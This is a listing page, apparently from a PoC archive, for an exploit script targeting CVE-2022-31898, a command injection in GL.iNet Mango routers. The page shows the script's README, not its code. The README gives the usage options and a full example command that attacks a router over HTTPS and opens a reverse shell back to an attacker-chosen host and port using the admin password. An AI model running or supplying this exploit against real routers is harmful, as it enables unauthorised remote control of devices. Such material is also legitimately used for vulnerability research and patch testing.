CVE-2022-31898 PoC — GL.iNet GL-MT300N-V2 Mango 操作系统命令注入漏洞

Source

Associated Vulnerability

Description

Exploit POC code for CVE-2022-31898, a command injection for GL-iNet routers with firmware below 3.215

Readme

# cve-2022-31898
Exploit POC code for CVE-2022-31898, a command injection for GL-iNet routers with firmware below 3.215

# Usage

```
./cve-2022-31898.py -h
usage: cve-2022-31898.py [-h] -R RHOST [-P RPORT] -L LHOST [-l LPORT] [-p PWD] [-t]

options:
  -h, --help            show this help message and exit
  -R RHOST, --rhost RHOST
                        IP/hostname of Mango router
  -P RPORT, --rport RPORT
                        Port to connect to Mango router on
  -L LHOST, --lhost LHOST
                        Local host/IP for reverse shell to connect back to
  -l LPORT, --lport LPORT
                        Local port for reverse shell to connect back on
  -p PWD, --pwd PWD     Password to use to log in
  -t, --https           If set, use HTTPS
```

## Example

Exploit GL-iNet router at `192.168.8.1` over HTTPS and connect back to local box at
`192.168.8.123:8008` with admin password `password`:

```
./cve-2022-31898.py -R 192.168.8.1 -P 443 -L 192.168.8.123 -l 8008 -p password -t
```

File Snapshot

 [4.0K]  /data/pocs/65ffdf8fae7b4d778d2c1f847f197c75ae53c2a2
├── [2.8K]  cve-2022-31898.py
├── [ 34K]  LICENSE
└── [1006]  README.md

0 directories, 3 files

Remarks